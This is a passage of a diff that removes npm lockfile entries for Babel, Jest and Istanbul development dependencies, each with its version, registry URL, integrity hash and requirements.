"^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": 